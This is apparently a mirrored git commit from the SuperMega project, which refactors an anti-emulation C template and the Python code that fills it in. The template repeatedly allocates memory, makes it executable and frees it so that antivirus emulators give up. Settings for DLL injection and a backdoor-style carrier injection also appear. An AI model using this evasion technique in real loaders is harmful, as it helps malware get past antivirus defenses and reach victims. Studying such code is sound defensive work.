mirror of
https://github.com/dobin/SuperMega
synced 2026-06-03 01:27:11 +00:00
refactor: improve sirallocalot
This commit is contained in:
Dobin
@@ -1,13 +1,16 @@
|
|||||||
|
|
||||||
|
|
||||||
#define SIR_ITERATION_COUNT {{SIR_ITERATION_COUNT}}
|
|
||||||
#define SIR_ALLOC_COUNT {{SIR_ALLOC_COUNT}}
|
|
||||||
|
|
||||||
#define SIR_SLEEP_TIME 200 // ms
|
|
||||||
|
|
||||||
|
|
||||||
/* This will allocate SIR_ALLOC_COUNT RW memory regions,
|
/* This will allocate SIR_ALLOC_COUNT RW memory regions,
|
||||||
set them to RX, and free them
|
set them to RX, and free them.
|
||||||
|
And this SIR_ITERATION_COUNT times.
|
||||||
|
|
||||||
|
SIR_ITERATION_COUNT: Single digits, around 5
|
||||||
|
SIR_ALLOC_COUNT: Tripple digits, around 100
|
||||||
|
|
||||||
|
Memory : SIR_ALLOC_COUNT * payload_length
|
||||||
|
Cycles : SIR_ALLOC_COUNT * payload_length * SIR_ITERATION_COUNT
|
||||||
|
Time : SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * payload_length * ?
|
||||||
|
API calls: SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * 3
|
||||||
|
|
||||||
The idea is that the AV emulator will probably give up, either because
|
The idea is that the AV emulator will probably give up, either because
|
||||||
of used memory is above maximum, or amount of instructions, or
|
of used memory is above maximum, or amount of instructions, or
|
||||||
@@ -18,11 +21,11 @@
|
|||||||
*/
|
*/
|
||||||
|
|
||||||
void antiemulation() {
|
void antiemulation() {
|
||||||
void* allocs[SIR_ALLOC_COUNT];
|
void* allocs[{{SIR_ALLOC_COUNT}}];
|
||||||
DWORD result;
|
DWORD result;
|
||||||
|
|
||||||
for(int i=0; i<SIR_ITERATION_COUNT; i++) {
|
for(int i=0; i<{{SIR_ITERATION_COUNT}}; i++) {
|
||||||
for(int n=0; n<SIR_ALLOC_COUNT; n++) {
|
for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
|
||||||
allocs[n] = VirtualAlloc(
|
allocs[n] = VirtualAlloc(
|
||||||
NULL,
|
NULL,
|
||||||
{{PAYLOAD_LEN}},
|
{{PAYLOAD_LEN}},
|
||||||
@@ -37,33 +40,23 @@ void antiemulation() {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Write something.
|
for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
|
||||||
/*for(int n=0; n<SIR_ALLOC_COUNT; n++) {
|
|
||||||
char *alloc = allocs[n];
|
|
||||||
alloc[0] = 0; // overwrite the first byte
|
|
||||||
}*/
|
|
||||||
|
|
||||||
for(int n=0; n<SIR_ALLOC_COUNT; n++) {
|
|
||||||
if (VirtualProtect(
|
if (VirtualProtect(
|
||||||
allocs[n],
|
allocs[n],
|
||||||
{{PAYLOAD_LEN}},
|
{{PAYLOAD_LEN}},
|
||||||
p_RX,
|
p_RX,
|
||||||
&result) == 0)
|
&result) == 0)
|
||||||
{
|
{
|
||||||
return 7;
|
return;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
Sleep(SIR_SLEEP_TIME);
|
|
||||||
|
|
||||||
BOOL bSuccess;
|
BOOL bSuccess;
|
||||||
for(int n=0; n<SIR_ALLOC_COUNT; n++) {
|
for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
|
||||||
bSuccess = VirtualFree(
|
bSuccess = VirtualFree(
|
||||||
allocs[n],
|
allocs[n],
|
||||||
{{PAYLOAD_LEN}},
|
{{PAYLOAD_LEN}},
|
||||||
0x00008000); // MEM_RELEASE
|
0x00008000); // MEM_RELEASE
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -22,6 +22,8 @@ char *supermega_payload;
|
|||||||
|
|
||||||
{{plugin_executionguardrail}}
|
{{plugin_executionguardrail}}
|
||||||
|
|
||||||
|
{{plugin_virtualprotect}}
|
||||||
|
|
||||||
|
|
||||||
int main()
|
int main()
|
||||||
{
|
{
|
||||||
|
|||||||
@@ -23,6 +23,10 @@ class Settings():
|
|||||||
|
|
||||||
self.dllfunc: str = "" # For DLL injection
|
self.dllfunc: str = "" # For DLL injection
|
||||||
|
|
||||||
|
# Anti-debugging
|
||||||
|
self.sir_iteration_count: int = 5
|
||||||
|
self.sir_alloc_count: int = 100
|
||||||
|
|
||||||
# Injectable
|
# Injectable
|
||||||
self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
|
self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
|
||||||
self.inject_exe_in: FilePath = ""
|
self.inject_exe_in: FilePath = ""
|
||||||
|
|||||||
+10
-6
@@ -60,15 +60,19 @@ def create_c_from_template(settings: Settings, payload_len: int):
|
|||||||
filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
|
filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
|
||||||
settings.plugin_antiemulation)
|
settings.plugin_antiemulation)
|
||||||
with open(filepath_antiemulation, "r", encoding='utf-8') as file:
|
with open(filepath_antiemulation, "r", encoding='utf-8') as file:
|
||||||
sir_iteration_count = 5
|
sir_iteration_count = settings.sir_iteration_count
|
||||||
sir_alloc_count = (int(config.get("sir_target_mem")) / payload_len)+1
|
sir_alloc_count = settings.sir_alloc_count
|
||||||
|
# sir_alloc_count = int((int(config.get("sir_target_mem")) / payload_len))+1
|
||||||
|
max_alloc_count = 256
|
||||||
|
if sir_alloc_count > max_alloc_count:
|
||||||
# if too large, compiler will add a __checkstk dependency
|
# if too large, compiler will add a __checkstk dependency
|
||||||
if sir_alloc_count > 256:
|
logging.warning("Too large sir allocation count {}, setting to max {}".format(
|
||||||
sir_alloc_count = 256
|
sir_alloc_count, max_alloc_count
|
||||||
logging.info(" AntiEmulation target: iterations: {} alloc: {}".format(
|
))
|
||||||
|
sir_alloc_count = max_alloc_count
|
||||||
|
logging.info("> AntiEmulation: iterations: {} allocs: {}".format(
|
||||||
sir_iteration_count, sir_alloc_count)
|
sir_iteration_count, sir_alloc_count)
|
||||||
)
|
)
|
||||||
|
|
||||||
plugin_antiemualation = file.read()
|
plugin_antiemualation = file.read()
|
||||||
plugin_antiemualation = Template(plugin_antiemualation).render({
|
plugin_antiemualation = Template(plugin_antiemualation).render({
|
||||||
'PAYLOAD_LEN': payload_len,
|
'PAYLOAD_LEN': payload_len,
|
||||||
|
|||||||
Reference in New Issue
Block a user